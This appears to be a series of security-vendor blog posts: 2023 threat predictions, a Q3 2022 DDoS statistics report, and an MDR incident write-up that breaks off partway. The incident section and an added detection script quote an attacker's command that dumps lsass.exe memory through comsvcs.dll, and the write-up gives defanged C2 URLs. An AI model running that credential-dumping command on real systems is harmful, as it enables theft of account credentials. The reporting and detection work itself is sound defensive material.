What are the main challenges cybersecurity will face in 2023?

Ivan Kwiatkowski, senior security researcher, GReAT, Kaspersky

The security industry will face direct pressure resulting from the political situation. Things were complex before and they will only get worse. The biggest challenge that vendors will have to face in 2023 will be to remain neutral, if they haven’t decided to align with one block or the other already. (My opinion on this bigger matter is explained in this talk.) Generally speaking, politics and threat intelligence will become more and more entwined, and we’re very unprepared for this as a community.

Yury Slobodyanuk, head of content filtering research, Kaspersky

I think attacks will evolve a lot quicker next year, and a main challenge will be to still be a couple of steps ahead.

Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

I don’t think that there will be anything substantially new in 2023 – one of the key challenges will still be the lack of adoption of basic security and resilience measures which cybercriminals will successfully exploit.

Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

Cybersecurity requires not only secure software, but also sufficiently trustworthy hardware. For too long, we have relied on globalization in IT security and placed too little emphasis on protecting the digital supply chain. In Germany, this was made clear by the debate about protecting sensitive 5G networks; in the geostrategic conflict between the People’s Republic of China and Taiwan, we are now seeing that we are already in the midst of a semiconductor crisis that threatens the security of supply with trustworthy IT. Here, it can be assumed that significant cybersecurity challenges will continue to rise in 2023 as political tensions grow.

Serge Droz, Technical Advisor, Member of the Board, FIRST

Cybercrime will continue to focus on optimizing gains per investment, meaning that smaller and/or less mature organizations will be targeted even more. These may be SMEs or businesses in sectors that don’t include IT in their core business, in particular health services. The problem with this target group is that they either have very different priorities (a ransomed hospital simply cannot afford to delay recovery, and thus pays) and don’t have the resources to defend themselves, or they just don’t have the expertise. This is what Wendy Nather calls “living below the security poverty line”. And this will be the challenge to our industry: how can we provide effective protection that works and is affordable to these types of organizations. Or in other words, can we provide security services to people other than for security specialists? My guess would be that reaching this goal requires different industries working together, in particular I feel the role of insurance needs to be clarified and aligned.

James Range, President of White Rock Security Group

Cyber teams are going to be in the spotlight now more than ever. Understanding your security posture is crucial; knowing what current tools are available and the gaps that currently exist in your infrastructure will help you to protect your enterprise. The need for bigger cyber budgets and having the right people in place is critical. With ongoing talent shortages, consider partnering with a third-party firm to ensure you have fail-proof processes, documentation, and regular third-party assessments.

H.E. Dr. Mohamed Al Kuwaiti, UAE Cyber Security Council

DDoS botnets. One of the most recent severe attacks, around the end of June 2021, was made using malware called the Mēris botnet, which has climbed to the record. Due to the new nature of the malware, which has been described as a “new assaulting force on the Internet – a botnet of a new kind”, and its impact, it is more likely that similar real-time emerging malware-related DDoS attacks like this one will be used in 2023.

Ransomware as a service (RaaS). Unlike other forms of malware, this new service provides “a sort of criminal Content Distribution Network (CDN) similar, in principle, to those used by major internet portals but used exclusively for malware”. Nearly half of breaches during the first six months of 2022 involved stolen credentials, Switzerland-based cybersecurity company Acronis reported in its Mid-Year Cyberthreat Report, published on August 24, 2022. This has probably been the most discussed attack in 2022 as it’s the first time a country declared a national emergency in response to a cyber-attack. Ransomware-based malware had been quite active in 2022.

Deepfake-enabled business compromise. Deepfake-enabled compromise is a type of attack where threat actors leverage synthetic content. This includes video or audio altered or created using artificial intelligence and machine learning to impersonate C-suite executives and trick employees into transferring large sums of cash.

DDoS attacks in Q3 2022

7 November, 2022 - 09:00

News overview

In Q3 2022, DDoS attacks were, more often than not, it seemed, politically motivated. As before, most news was focused on the conflict between Russia and Ukraine, but other high-profile events also affected the DDoS landscape this quarter.

The pro-Russian group Killnet, active since January 2022, took the responsibility for several more cyberattacks. According to the hacktivists themselves, more than 200 websites in Estonia fell victim to their attacks, including the ESTO AS payment system. In nearby Lithuania, the websites and e-services of the energy company Ignitis Group were hit. Both attacks were described by the affected organizations as the largest they’ve faced in the last 10–15 years.

Killnet also claimed responsibility for an attack on the website and services of the US Electronic Federal Tax Payment System. The attackers stated on Telegram that they were “testing a new DDoS method.” During the attack, they said, the site administration tried to change the DDoS protection vendor, but then had a rethink. In addition, Killnet disrupted the US Congress website for a couple of hours.

On the other side of the Pacific, in Japan, 20 websites of four different government departments were hit by DDoS attacks. Killnet hacktivists claimed involvement in this incident, too. The defending side managed to eliminate the main damage within 24 hours, although the e-Gov administrative portal continued to experience access problems the day after.

The lesser known pro-Russian group Noname057(16) took the credit for the attacks on the website of Finland’s parliament and the publication archive of its government, which they managed to take offline temporarily. If the group’s Telegram channel is to be believed, the reason for the attacks was because “[Finnish] officials are so eager to join NATO.”

In turn, Russian resources suffered from DDoS attacks by pro-Ukrainian hacktivists. Victims included the Unistream, Korona Pay, and Mir payment systems, as well as the Russian National Payment Card System, which ensures the operation of Mir and the Faster Payments System. What’s more, activists brought down the website, call center, and SMS provider of Gazprombank; Otkritie Bank noted disruptions to its internet banking service and mobile app, and SberBank reported 450 repelled DDoS attacks in the first two months of Q3. According to SberBank, this is the same number as in the previous five years put together.

Electronic document management systems, in particular SKB Kontur and Taxcom, were also in the firing line. Their websites were either down or slow, which caused supply troubles for dairy producers. Also hit were the websites of the political parties United Russia, Young Guard of United Russia, and A Just Russia — For Truth.

Media outlets did not go unaddressed either: RIA Novosti and Sputnik suffered attacks that lasted almost 24 hours, while the website of Argumenti i Fakti was unavailable for some time. Meanwhile, StormWall reported that 70 regional newspapers in 14 Russian cities, among them Bryansk, Kaluga, Chelyabinsk, Pskov, Omsk, Tyumen, and Sochi, were hit by garbage traffic.

A wave of DDoS attacks swept across many tech and entertainment companies as well. Hacktivists attacked around 20 Russian video-conferencing platforms. Among the services affected were TrueConf, Videomost, Webinar.ru, and iMind. Also targeted were the websites of Kinomax, Mori Cinema, Luxor, Almaz Cinema, and other movie theaters. Hacktivists also tried to disable the websites of the car information portal Drom, the drone store MyDrone, and the security vendor Avangard.

Already in Q1, various sites and apps were available to allow technically inexperienced users who sympathize with Ukraine to join DDoS attacks against Russian resources. The Russian-speaking APT group Turla exploited the hype. In July, Google researchers reported a piece of Android malware being distributed by cybercriminals under the guise of a DDoS tool for attacking Russian websites. According to experts, this is Turla’s first ever malware for Android.

Besides the Russia–Ukraine conflict, there were reports of politically motivated DDoS attacks in other hot spots on the planet. US Congress Speaker Nancy Pelosi’s visit to Taiwan provoked not only a public outcry in mainland China, but also a string of cyberattacks both before her arrival on the island and in the hours immediately after. In particular, the websites of Taiwan’s president and its Ministry of National Defense experienced downtime. Also affected were the online resources of the Ministry of Foreign Affairs and Taoyuan International Airport.

Israel, too, became a DDoS target when cybercriminals attacked the websites of the country’s Ministry of Health and Tel Aviv-Yafo Municipality. As a result, access to these resources from abroad was limited. Responsibility for the cyberattacks was claimed by Al-Tahira (aka ALtahrea), a group opposed to NATO and its allies.

The post-Soviet space was also a hotbed of activity. Amid the escalating conflict between Armenia and Azerbaijan, a DDoS attack battered the official site of the Collective Security Treaty Organization (CSTO), a Russia-led military alliance in Eurasia. The CSTO reported that attackers, under the guise of a DDoS, had attempted to change some information on its website. And in the last third of September, the Kazakhstani segment of the internet faced a DDoS onslaught from abroad. At around the same time, local media (Top Press, New Times, Skif News) were also subjected to DDoS attacks.

Some events in Q3 could not be described as unambiguously political. For example, the company Russian Environmental Operator reported DDoS attacks on the new Secondary Material Resources Exchange immediately after the announcement of the platform’s launch. Although this may have been part of a hacktivist campaign, new online resources regularly face DDoS attacks before going live even during quiet times. The largest Russian-language torrent tracker RuTracker and the entertainment portal Live62 also admitted to being attacked in Q3. Both sites have been beset by copyright infringement claims, and RuTracker has been blocked in Russia as a pirate resource.

In addition, a number of firms specializing in DDoS protection reported major attacks in Q3.

Akamai announced two major attacks on the same client from Eastern Europe. In both cases, the number of packets per second sent by the attackers was extraordinary. The first attack, on July 21, peaked at 659.6 million packets per second, a new European record at the time, says Akamai. This was not an isolated case: in July, this same client was attacked more than 70 times. The record held until September 12, when another attack posted 704.8 million packets per second.

In continuation of a Q2 trend, Google says it blocked an HTTPS-based DDoS attack that peaked at 46 million requests per second, 77 percent more than the record-breaking HTTPS attack mentioned in our previous report. According to experts, the attack involved more than 5,000 IP addresses from 132 countries, with around 30 percent of the traffic coming from Brazil, India, Russia, and Indonesia. The geographical distribution and botnet characteristics suggest the use of the Mēris family.

Lumen reported stopping an attack with a capacity of over 1 terabyte per second on the servers of its client. At the time of the attack, the target servers were hosting a gaming service. In the week leading up to the incident, the attackers tested various DDoS methods and studied the victim’s protection capabilities by issuing commands to bots from three different C2 servers.

Gaming services are regularly targeted by DDoS. In Q3, the servers of Gaijin Entertainment, which developed War Thunder, Enlisted, and Crossout, were hit by an extended series of attacks. They began on September 24, and users were still complaining of disruptions at the time of writing. To reduce the negative effect of the DDoS attack, Gaijin promised to extend its promotions and premium subscriptions, as well as award bonuses to players for a whole week.

The North American data centers of Final Fantasy 14 were attacked in early August. Players experienced connection, login, and data-sharing issues. Blizzard’s multiplayer games — Call of Duty, World of Warcraft, Overwatch, Hearthstone, and Diablo: Immortal — were also DDoSed yet again.

An ESL eSports match between the teams NaVi and Heroic was held up for over an hour due to a DDoS attack on individual players. The match continued only after the organizer had dealt with the threat.

In turn, the developers of the game Tanki Online announced they had finally neutralized a string of DDoS attacks that had plagued players since the summer. Having beefed up protection and stabilized the servers, the organizers thanked the players for their patience with a prize giveaway.

That was not the only good news regarding DDoS attacks on gaming services this quarter: in Sweden, police detained a suspect in a DDoS attack on Esportal, a CS:GO tournament platform. If convicted, they face from six months to six years in prison.

Anti-DDoS measures are also being implemented at the national level. For instance, Israel announced the launch of the Cyber-Dome project, designed to secure national digital resources. According to the Israel National Cyber Directorate, having a single protective complex will “elevate national cybersecurity by implementing new mechanisms in the national cyber perimeter and reducing the harm from cyberattacks at scale.”

In Bangladesh, the governmental Computer Incident Response Team required all key organizations, including those responsible for the country’s IT infrastructure, to develop and introduce anti-DDoS measures. This came after a reported spike in attacks.

At the same time, the global legal consensus that any DDoS attack constitutes a cybercrime came under threat in Q3, and from an unexpected source. The Hungarian Cable Communications Association (MKSZ) requested that the law be changed to officially allow MKSZ members and legal enterprises from the telecom industry to carry out DDoS attacks as a means of combating IPTV piracy. Traditional measures, such as blocking IP addresses and domain names, MKSZ described as slow and ineffective, while legally sanctioned cyberattacks could genuinely force users to abandon pirate services.

It was not only Hungarian telecom companies that had the idea of taking the fight to cybercriminals. After the ransomware group LockBit hacked Entrust, a specialist cybersecurity firm, and began publishing confidential data, unknown actors attacked the site where the information was being leaked. The packets they sent contained an unambiguously worded message: DELETE_ENTRUSTCOM_[BAD_WORD].

Quarter trends

The main surprise of Q3 2022 was the lack of surprises, which had been a constant since late 2021. But that doesn’t mean it was a dull quarter. Let’s take a look at the statistics.

Comparative number of DDoS attacks, Q3 2021, Q2 and Q3 2022. Q3 2021 data is taken as 100%

The first thing worth noting is the significant rise in the number of DDoS attacks of all types relative to the previous reporting period. At the same time the quarter picture is fairly standard: a relatively calm summer followed by a sharp surge in DDoS activity. In September, the Kaspersky DDoS Protection team repelled 51 percent of all attacks in the quarter, which amounts to roughly the same number as in the previous two months. This is a normal situation that we observe and report on every year. Usually the autumn growth is more of a recovery after the summer slump, but the fact remains that the number of DDoS attacks always increases sharply in September. This is due to a general rise in activity after the lazy summer months: people return from vacation, students go back to school, and everything picks up, including the DDoS market.

Share of smart attacks, Q3 2021 and Q2/Q3 2022

What is unusual, however, is the continued growth in the share of smart attacks, which, with 53 percent, already account for the majority, setting a new record in the history of our observations. Moreover, DDoS attacks on HTTP(S) this quarter exceeded those on TCP for the first time, despite the latter being easier to organize and still the most common type of DDoS.

Ratio of HTTP(S) and TCP attacks, Q2 2021–Q3 2022. The number of TCP-based attacks for the corresponding period is taken as 100%

What’s most interesting is that, in absolute terms, the number of attacks on HTTP(S) has remained quite stable over the past year. The share of attacks on TCP is on a downward curve, which reflects well the general trend: the share of dumb DDoS attacks is falling, while that of smart attacks is growing. This was bound to happen sooner or later, as tools on both the attacking and defending sides evolve and become more readily available. Organizing L7 attacks is getting easier, while L4 attacks are losing their effectiveness. As a result, they are being used less and less by professionals in their pure form (although L4 vectors are still found in mixed attacks), and more and more by amateurs. The above figures illustrate this well.

Note this Q1 2022 stat: There were half as many DDoS attacks on HTTP(S) as on TCP. February and March saw a significant increase in non-professional attacks due to the geopolitical situation, as outlined in our report. Hacktivists are passionate but fickle. Having quickly tired of DDoS, they switched to other attacks, and the share of DDoS started to fall. By Q3, it was tending to zero. Meanwhile, the number of high-quality professional attacks, after increasing in Q1, remains at a high level. The targets have not changed either: mainly the financial and government sectors. Both of these facts reinforce our notion that, from the spring until at least the end of September, professionals were working to order against these sectors, which is reflected in our statistics.

In terms of DDoS attack duration, there were no new records: if Q2 was marked by the longest attack ever observed, Q3 was calmer: on average, attacks lasted about eight hours, with the longest being just under four days. Compared to the previous quarter, this seems rather modest, but the numbers are still huge: in Q3 of last year, the duration of DDoS attacks was measured in minutes, not hours. In this regard, the situation remains challenging.

DDoS attack duration, Q3 2021 and Q2/Q3 2022. Q3 2021 data is taken as 100%

DDoS attack statistics

Methodology

Kaspersky has a long history of combating cyberthreats, including DDoS attacks of varying type and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C2 servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q3 2022.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same resource is attacked by the same botnet after an interval of 24 hours or more, two attacks will be counted. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographic locations of DDoS-attack victims and C2 servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.
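The counting rules above (a gap of 24 hours or more splits one botnet’s activity against one target into two attacks, different botnets against the same target count separately, and targets are counted by unique IP address) can be written as a small merging routine. The following is an added example for this page, not Kaspersky’s DDoS Intelligence code; the record layout is an assumption and the activity records are constructed.

```python
from datetime import datetime, timedelta

# A gap of 24 hours or more between two activity periods of the same botnet
# against the same target starts a new attack (the report's example case).
NEW_ATTACK_GAP = timedelta(hours=24)

# Constructed records in an assumed layout: (botnet id, target IP, start, end)
# of bot-command activity periods. Not real DDoS Intelligence telemetry.
ACTIVITY = [
    ("botnet-A", "203.0.113.10", "2022-07-01 10:00", "2022-07-01 12:00"),
    ("botnet-A", "203.0.113.10", "2022-07-01 20:00", "2022-07-02 01:00"),  # 8 h gap: same attack
    ("botnet-A", "203.0.113.10", "2022-07-03 02:00", "2022-07-03 03:00"),  # 25 h gap: new attack
    ("botnet-B", "203.0.113.10", "2022-07-01 11:00", "2022-07-01 11:30"),  # other botnet: separate
    ("botnet-A", "198.51.100.7", "2022-07-05 00:00", "2022-07-05 04:00"),
    ("botnet-A", "198.51.100.7", "2022-07-06 00:00", "2022-07-06 00:30"),  # 20 h gap: same attack
]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M")


def merge_attacks(records):
    """Group activity periods per (botnet, target) and merge those separated by
    less than NEW_ATTACK_GAP into one attack.
    Returns a list of (botnet, target, attack_start, attack_end)."""
    periods = {}
    for botnet, target, start, end in records:
        periods.setdefault((botnet, target), []).append((_ts(start), _ts(end)))
    attacks = []
    for (botnet, target), spans in periods.items():
        spans.sort()
        cur_start, cur_end = spans[0]
        for start, end in spans[1:]:
            if start - cur_end >= NEW_ATTACK_GAP:
                attacks.append((botnet, target, cur_start, cur_end))
                cur_start, cur_end = start, end
            else:
                cur_end = max(cur_end, end)
        attacks.append((botnet, target, cur_start, cur_end))
    return attacks


def duration_bucket(hours):
    """Whole-hour buckets matching the report's duration breakdown."""
    h = int(hours)
    if h < 5:
        return "0-4h"
    if h < 10:
        return "5-9h"
    if h < 20:
        return "10-19h"
    return "20h+"


def summarize(records):
    """Attack count, unique targets (by IP) and duration figures for the records."""
    attacks = merge_attacks(records)
    hours = [(end - start).total_seconds() / 3600 for _, _, start, end in attacks]
    buckets = {}
    for h in hours:
        buckets[duration_bucket(h)] = buckets.get(duration_bucket(h), 0) + 1
    return {
        "attacks": len(attacks),
        "unique_targets": len({target for _, target, _, _ in attacks}),
        "longest_hours": max(hours),
        "average_hours": round(sum(hours) / len(hours), 2),
        "by_duration": buckets,
    }


if __name__ == "__main__":
    print(summarize(ACTIVITY))
```

On the constructed records this yields four attacks against two unique targets: botnet-A’s first two periods against 203.0.113.10 merge into one 15-hour attack, its third period 25 hours later is a second attack, botnet-B against the same IP is a third, and the 20-hour gap for 198.51.100.7 keeps that activity as a single 24.5-hour attack.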

Quarter summary

In Q3 2022:

  • Kaspersky’s DDoS Intelligence system detected 57,116 DDoS attacks.
  • A total of 39.61 percent of targets, affected by 39.60 percent of attacks, were located in the US.
  • The busiest day of the week (15.36 percent of attacks) was Friday and the calmest (12.99 percent) was Thursday.
  • July saw the sharpest contrast: The 1st and 5th saw 1494 and 1492 attacks, respectively, and the 24th just 135.
  • Attacks lasting less than four hours accounted for 60.65 percent of the total duration of attacks and for 94.29 percent of the total number of attacks.
  • UDP flood accounted for 51.84 percent of the total number of attacks, and SYN flood for 26.96 percent.
  • The country with the largest share of bots trying to hack into Kaspersky SSH honeypots was the US (17.60%).

DDoS attack geography

In Q3 2022, the top four countries in terms of resources attacked remained unchanged from the previous reporting period. The US (39.60%) remained in first place, despite losing 6.35 percentage points. Mainland China’s share (13.98%) increased by almost the same amount, up 6.31 percentage points, securing second place. Germany (5.07%) remains in third and France (4.81%) in fourth place.

Hong Kong (4.62%) rounded out the TOP 10 countries and territories with the highest number of DDoS attacks last quarter. Having seen its share more than double this quarter, it now ranks fifth. Brazil (4.19%) moved up into sixth position, while Canada (4.10%) and the UK (3.02%), which ranked fifth and sixth last quarter, dropped to seventh and eighth, respectively. Propping up the TOP 10 are Singapore (2.13%) and the Netherlands (2.06%).

Distribution of DDoS attacks by country and territory, Q2 and Q3 2022

The distribution of unique DDoS attack targets by country and territory is almost a carbon copy of the attack rating. In first place is the US (39.61%), followed by mainland China (12.41%), whose share grew most noticeably over the quarter, up 4.5 percentage points. Third place still belongs to Germany (5.28%), and fourth to France (4.79%).

As in the distribution of attacks, Brazil (4.37%) and Hong Kong (4.36%) ranked fifth and sixth by number of unique targets, but in reverse order. The former was home to slightly more DDoS targets, while the latter showed larger growth against the previous reporting period, climbing 2.36 percentage points. Canada (3.21%), the UK (2.96%) and Singapore (2.11%) occupied lines seven to nine in the table, while tenth place went to Poland (2.00%), squeezing the Netherlands (1.86%) out of the TOP 10.

Distribution of unique targets by country and territory, Q2 2022 and Q3 2022

Dynamics of the number of DDoS attacks

The number of DDoS attacks in Q3 2022 fell again. Having decreased by 13.72 percent in the previous reporting period relative to the one before, this quarter it dropped by a further 27.29 percent, to 57,116. August proved to be the busiest month, with Kaspersky’s DDoS Intelligence system detecting an average of 824 attacks per day. July, on the other hand, was calm: 45.84 percent of all attacks during this month occurred in the first seven days, maintaining the dynamics of June, which posted an average of 1301 per day; starting from week two, however, the average number of daily attacks fell to 448. Thus, the July average was just 641 DDoS attacks per day, slightly ahead of the even quieter September, which averaged 628.5. At the same time, September’s attacks were distributed more evenly throughout the month.

The quarter’s peak and trough both came in July: the most aggressive day was the 1st (1494 attacks); the calmest was the 24th (135). In August, over a thousand attacks were recorded on the 8th and 12th alone (1087 and 1079, respectively), and the quietest day was the 30th (373). September delivered no noteworthy highs or lows.

Dynamics of the number of DDoS attacks, Q3 2022

Sunday (13.96%) in Q3 fell by 1.85 percentage points compared to the previous reporting period, and lost its position as the leading day in terms of traffic. Saturday’s share also declined, but remained above 15 percent. First place by number of DDoS attacks went to Friday, which showed a noticeable increase — from 13.33 to 15.36 percent. Thursday was the only day whose share dropped below 13 percent, down to 12.99 percent.

Distribution of DDoS attacks by day of the week, Q3 2022

Thursday was also the only weekday that saw its share decrease.

Duration and types of DDoS attacks

In Q3 2022, sustained attacks of 20 hours or more accounted for 19.05 percent of the total duration of attacks. This figure almost tripled after falling in the previous reporting period, almost returning to the level seen at the beginning of the year. Accordingly, the proportion of long-term attacks by number also increased: from 0.29 to 0.94 percent.

Short attacks lasting up to four hours showed a slight decrease to 94.29 percent. At the same time, their share of the total duration of DDoS attacks fell significantly, from 74.12 to 60.65 percent. Attacks lasting from five to nine hours remained in second place (3.16% of attacks); attacks lasting from 10 to 19 hours were in third (1.60%).

The longest attack of Q3 lasted 451 hours (18 days 19 hours). That was way ahead of the second-place 241 hours (10 days 1 hour). The average duration of attacks rose slightly to around 2 hours 2 minutes, which is not surprising given the increase in the share of sustained attacks and the decrease in the share of short ones.

Distribution of DDoS attacks by duration, Q2 and Q3 2022

In Q3 2022, the ranking of DDoS attack types was unchanged from the previous reporting period. The share of UDP flood fell from 62.53 to 51.84 percent, but remained the most common type of DDoS. The second most common, SYN flood, on the contrary, increased its share to 26.96 percent. TCP flood (15.73%) reversed its decline, adding more than 4 percentage points to hold on to third place. GRE flood and HTTP flood made up 3.70 and 1.77 percent, respectively, of the total number of attacks.

Distribution of DDoS attacks by type, Q3 2022

Geographic distribution of botnets

Botnet C2 servers are still mainly located in the US (43.10%), but its share fell by 3 percentage points. The Netherlands (9.34%), which ranked second last quarter, slipped more than 5 percentage points and again changed places with Germany (10.19%). Russia (5.94%) stayed in fourth place.

Asian countries come next: fifth place goes to Singapore (4.46%) and sixth to Vietnam (2.97%), whose share in Q3 continued to grow, although not as rapidly as in Q2. They are followed by a new entry in the ranking, Bulgaria (2.55%), whose share increased more than sixfold.

France dropped from fifth place to eighth (2.34%), and the UK (1.91%) to ninth. Canada and Croatia, which rounded out last quarter’s TOP 10, gave way to Hong Kong (1.49%) by number of C2 servers.

Distribution of botnet C2 servers by country and territory, Q3 2022

Attacks on IoT honeypots

In Q3, mainland China surrendered its lead in terms of number of bots attacking Kaspersky SSH honeypots: its share dropped to 10.80 percent. First place was claimed instead by US-based bots (17.60%). Third, fourth, and fifth positions, with hardly any distance between, belong to India (5.39%), South Korea (5.20%), and Brazil (5.01%). Germany (4.13%) dropped from third place last quarter to seventh, but bots based there were among the most active in Q3, responsible for 11.22 percent of attacks. This figure is bettered only by the US bots (27.85%). What’s more, over five percent of attacks came from bots in Singapore (5.95%) and India (5.17%), which took third and fourth place, respectively.

TOP 10 countries and territories by number of devices from which Kaspersky SSH traps were attacked, Q3 2022

As for Kaspersky Telnet honeypots, here mainland China retained its lead among countries and territories by number of both attacks and attacking devices. The first figure, however, declined from 58.89 to 38.18 percent, while the second climbed slightly from 39.41 to 41.91 percent. Second place by number of attacks went to the US (11.30%), with Russia third (9.56%). In terms of their share of bots, these two countries rank slightly lower: in sixth (4.32%) and fourth (4.61%) place, respectively. The TOP 3 countries by number of bots featured South Korea (8.44%) and India (6.71%). Taiwan ranked fifth with 4.39 percent.

TOP 10 countries and territories by number of devices from which Kaspersky Telnet traps were attacked, Q3 2022

Conclusion

The situation in Q3 2022 points to a stabilization of the DDoS market after a tumultuous first half of the year, although it remains difficult. Yet the picture changes every quarter and forecasts remain tentative at best: pretty much anything can happen. That said, we don’t expect any significant surges or drops in Q4. If our conclusions are correct, and the market is indeed back on a predictable track, we expect similar indicators in Q4 as in Q3, adjusted for the slight growth we usually see toward the end of the year. In any case, we can assume such a development in terms of both number and quality of attacks. As for duration, here we can only guess: the DDoS market is still very far from the norm, and the length of attacks tends to jump up and down. We hope that Q4 shows relative stability in this regard, too, and does not try to break any records.

Server-side attacks, C&C in public clouds and other MDR cases we observed

2 November, 2022 - 09:00

Introduction

This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.

Command and control via the public cloud

The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.

Case #1: Cloudflare Workers as redirectors

Case description

The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belongs to the process c:\windows\system32\[legitimate binary name][1].exe.

While investigating, we found that the process had initiated network connections to a potential C&C server:

hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence]
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]

The URL format indicates the use of Cloudflare Workers.

We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:

CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full

Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.

The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.
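The two indicators described in this case, the comsvcs.dll MiniDump command line and an HTTP(S) connection to a Cloudflare Workers host from a non-browser process running at System integrity, can be checked with straightforward telemetry rules. The following is an added example written for this page, not Kaspersky MDR’s detection content; the event layout and the sample events are constructed (the command line in e1 follows the pattern quoted above with a placeholder file name, and the workers.dev host in e3 is a placeholder, not the incident’s).

```python
import re

# Case-insensitive: the observed command line used mixed case ("CMd.exE").
LSASS_DUMP_RE = re.compile(
    r"rundll32(?:\.exe)?\s+.*?comsvcs\.dll\s*,?\s*MiniDump\b", re.IGNORECASE)
LSASS_RE = re.compile(r"\blsass\b", re.IGNORECASE)
# Cloudflare Workers hostnames end in workers.dev.
WORKERS_RE = re.compile(
    r"^https?://(?:[a-z0-9-]+\.)+workers\.dev(?:[/?#:]|$)", re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}


def check_process_start(event):
    """T1003.001 indicator: comsvcs.dll MiniDump in a command line. The verdict
    notes whether lsass is referenced in the same command."""
    cmd = event.get("command_line", "")
    if not LSASS_DUMP_RE.search(cmd):
        return None
    target = "lsass" if LSASS_RE.search(cmd) else "unknown process"
    return f"T1003.001: comsvcs.dll MiniDump of {target}"


def check_http_connection(event):
    """T1071.001 indicator: workers.dev URL requested by a process that is not a
    browser and runs at System integrity. A browser visiting a site hosted on
    Workers is normal and is not flagged."""
    url = event.get("url", "")
    process = event.get("process", "").lower()
    integrity = event.get("integrity", "").lower()
    if WORKERS_RE.match(url) and process not in BROWSERS and integrity == "system":
        return "T1071.001: workers.dev beacon from non-browser System-integrity process"
    return None


CHECKS = {"process_start": check_process_start,
          "http_connection": check_http_connection}


def triage(events):
    """Return [(event id, verdict)] for every event matching a check."""
    hits = []
    for ev in events:
        check = CHECKS.get(ev.get("type"))
        verdict = check(ev) if check else None
        if verdict:
            hits.append((ev["id"], verdict))
    return hits


# Constructed telemetry in an assumed layout; not events from the incident.
EVENTS = [
    {"id": "e1", "type": "process_start", "process": "cmd.exe",
     "command_line": r'''CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\placeholder.doc full'''},
    {"id": "e2", "type": "process_start", "process": "rundll32.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"id": "e3", "type": "http_connection", "process": "placeholder-system-binary.exe",
     "integrity": "System",
     "url": "https://example-worker.example-account.workers.dev/jquery/secrets/abc"},
    {"id": "e4", "type": "http_connection", "process": "chrome.exe",
     "integrity": "Medium",
     "url": "https://example-worker.example-account.workers.dev/"},
]

if __name__ == "__main__":
    for event_id, verdict in triage(EVENTS):
        print(event_id, verdict)
```

Only e1 and e3 are flagged: the benign rundll32 control-panel call in e2 does not reference comsvcs.dll, and the browser request in e4 is excluded because the process is a browser and runs at Medium integrity. Restricting the workers.dev rule to non-browser, high-integrity processes is what keeps it usable in an environment where legitimate sites are hosted on Workers.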

Case detection

The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.

| MITRE ATT&CK technique | MDR telemetry event type used | Detection details | Description |
|---|---|---|---|
| T1588.002: Tool | AM engine detection on beacon | AM verdict: MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter | A malicious payload was executed in the victim’s system and started communicating with the C&C server |
| T1620: Reflective Code Loading | AM detection in memory; process injection | AM verdict: MEM:Trojan.Win64.Cobalt.gen; detection of code injection from an unknown binary into a system binary | The malicious payload migrated to the victim’s memory |
| T1071.001: Web Protocols | HTTP connection; process start | Suspicious HTTP connections to the malicious URL blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level | The attacker’s communications with the C&C server |
| T1584.006: Web Services | HTTP connection | URL reputation, regular expression in URL | The attacker’s communications with the C&C server |
| T1102.001: Dead Drop Resolver | HTTP connection | URL reputation, regular expression in URL | The attacker’s communications with the C&C server |
| T1003.001: LSASS Memory | AM detection on suspicious activity; process start | AM detection on lsass memory access; regex on a command like: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full | The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file |
| T1546.003: Windows Management Instrumentation Event Subscription | Windows event; WMI activity | WMI active script event consumer created remotely | The attacker gained persistence through active WMI |

Payload hidden in long text

Case #1: A scheduled task that loads content from a long text file

Case description

This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.

Scheduled task:

